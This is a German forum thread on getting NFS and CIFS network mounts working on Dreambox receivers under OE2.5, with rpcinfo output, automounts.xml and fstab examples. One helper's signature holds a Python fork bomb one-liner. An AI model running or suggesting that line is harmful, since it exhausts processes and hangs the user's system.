OE2.5: autofs oder networkbrowser?

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • griffel wrote:

      Solange ich es nicht richzig verstanden habe, werde ich weiter dumme Fragen stellen.
      Geht mir genauso.
      Wie versprochen kleine Rückinfo nach dem flashen der 7080 & der 820 mit OE2.5. Alles läuft wie es soll unter CIFS. Habe per auto.network die jeweils andere Box und meine Synology gemountet. KEINE CHance unter NFS. Nfs-Server läuft nicht oder nur nach manuellem anschupsen, mit Network Browser hängt sich die Box, egal welche, auf, NFS mit auto.network ohne Erfolg, keine Verbindung. Fazit:
      Mit CIFS OK
      Mit NFS nicht
      Bitte ein detailliertes "Howto" für NFS, sonst raff ich es nicht. Bin halt schon älter :]
    • Mit so mageren infos sollen wir was anfangen?
      Mal generell Netzwerkbrowser oder Autofs können nur was einbinden was auch läuft.
      Also als erstes überprüfen ob der NFS Server korrekt läuft.
      Per Telnet auf die Client box gehen und

      Source Code

      1. rpcinfo -p <ip von der nfs server box>
      2. oder
      3. showmount -e <ip von der nfs server box>
      und hier posten.Wenn nichts kommt läuft er auch nicht.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Biiteschön , Ausgabe von rpcinfo -p & showmount -e

      Display Spoiler
      login as: root
      root@192.168.178.54's password:
      root@dm7080:~# rpcinfo -p 192.168.178.54
      program vers proto port service
      100000 4 tcp 111 portmapper
      100000 3 tcp 111 portmapper
      100000 2 tcp 111 portmapper
      100000 4 udp 111 portmapper
      100000 3 udp 111 portmapper
      100000 2 udp 111 portmapper
      100005 1 udp 57207 mountd
      100005 1 tcp 50707 mountd
      100005 2 udp 47198 mountd
      100005 2 tcp 55673 mountd
      100005 3 udp 43073 mountd
      100005 3 tcp 36365 mountd
      100024 1 udp 51564 status
      100024 1 tcp 54223 status
      100003 3 tcp 2049 nfs
      100003 4 tcp 2049 nfs
      100003 3 udp 2049 nfs
      100003 4 udp 2049 nfs
      100021 1 udp 58545 nlockmgr
      100021 3 udp 58545 nlockmgr
      100021 4 udp 58545 nlockmgr
      100021 1 tcp 38336 nlockmgr
      100021 3 tcp 38336 nlockmgr
      100021 4 tcp 38336 nlockmgr
      root@dm7080:~# showmount -e 192.168.178.54
      Export list for 192.168.178.54:
      root@dm7080:~#

      The post was edited 1 time, last by sackisch ().

    • Juhuuuuuuuuuuuuuuu

      ich habe es hinbekommen entlich

      OE2.5 frisch installiert

      automounts.xml eingespielt

      VORHER was geändert !

      <
      <?xml version="1.0" encoding="UTF-8"?>
      <mountmanager>
      <nfs>
      <mount>
      <active>True</active>
      <hdd_replacement>False</hdd_replacement>
      <ip>192.168.1.157</ip>
      <sharename>QNAP</sharename>
      <sharedir>Multimedia</sharedir>
      <options>rw,nolock,tcp,vers=3</options>
      </mount>
      </nfs>
      <nfs>
      <mount>
      <active>True</active>
      <hdd_replacement>False</hdd_replacement>
      <ip>192.168.1.157</ip>
      <sharename>Rec</sharename>
      <sharedir>Recordings</sharedir>
      <options>rw,nolock,tcp,vers=3</options>
      </mount>
      </nfs>
      </mountmanager>

      also mit Proton die datei editiert und das das ,vers=3 zu gefügt


      dann den netzwerkbrowser installiert

      neustart....

      plopp


      alles da.....

      DANKEEEEEEEEEEEEEE !!!!!!!!!!!!!!!!! :thumbsup: :saufen:

      danach den backupmanger installiert und meine settings von 2.2 eingespielt

      ABER dran denken das da auch eine automounts.xml drine ist !


      Die habe ich natürlich vorher ausgetauscht oder ihr löscht die einfach aus dem BackupCatalog_V0.7_xxxxxxxx.tar.gz datei raus geht jedenfalls mit dem Total Commander ganz einfach !


      So jetzt kann ich ja meine Plugins installieren ! ;)
      Mfg Digi-Bit
    • kati910 wrote:

      Bei NFS wahr schon immer da das Problem das Server und Client die selbe Protokoll version unterstützen müssen sonst ist ein einbinden nur bedingt möglich.
      Bei OE2.5 untereinander ist es halt NFSv4 wenn man zuhause nur Boxen hatt mit OE2.5 bzw andere geräte die NFSv4 verwenden ist das kein problem dann muss man auch keine version angeben.
      Aber sobald man einen alten nfs server oder client hatt und den einbinden will wird das ohne angeben von versionen nicht gehen.
      Mein Server verwendet aktuell NFSv4. Wenn ich nun über den Networkbrowser ein Verzeichnis einbinden möchte funktioniert dies nicht. In der /etc/fstab fehlt dann der Eintrag "nfs4"
      Ich dachte es wird NFSv4 seit OE2.5 unterstützt. Wenn ich die /etc/fstab auf "nfs4" ändere geht es natürlich.

      Source Code

      1. root@dm7080:~# vi /etc/fstab
      2. #rootfs / rootfs rw,relatime 0 1
      3. proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
      4. sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
      5. devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620 0 0
      6. tmpfs /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0
      7. tmpfs /run tmpfs rw,nosuid,nodev,relatime,mode=755 0 0
      8. tmpfs /tmp tmpfs rw,relatime 0 0
      9. tmpfs /var/volatile tmpfs rw,relatime,mode=755 0 0
      10. /dev/disk/by-uuid/bddf6326-eac8-494f-947e-7aaa6d7aa510 /media/hdd auto auto,nofail 0 0
      11. 192.168.2.25:/Movie /media/EAGLE nfs udp,rw,rsize=8192,noauto,x-systemd.automount,wsize=8192,soft,nolock,nofail 0 0
      Display All
    • ahhh ok, die sind also immernoch beim OE2.2. Da erübrigt sich die Frage, wobei die doch bestimmt auch mal ein OE2.5 bringen werden, aber das gehört ja nicht hier her ;) .
    • nein die sind auch nicht bei OE 2.0 oder 2.2. Nur weil sie in Teilbereichen die gleichen kernel treiber und libs verwenden entspricht das nicht dem OE so wie DMM das umgesetzt hat.

      Das Enigma2 das dort verwendet wird ist eine zu tode gepatchte nun bereits 5 jahre alte version. Alleine die Unterschiede bei den skinns sind bereits legion.
      Bad mood, bad manners, bad Plugins, you have been warned :whistling: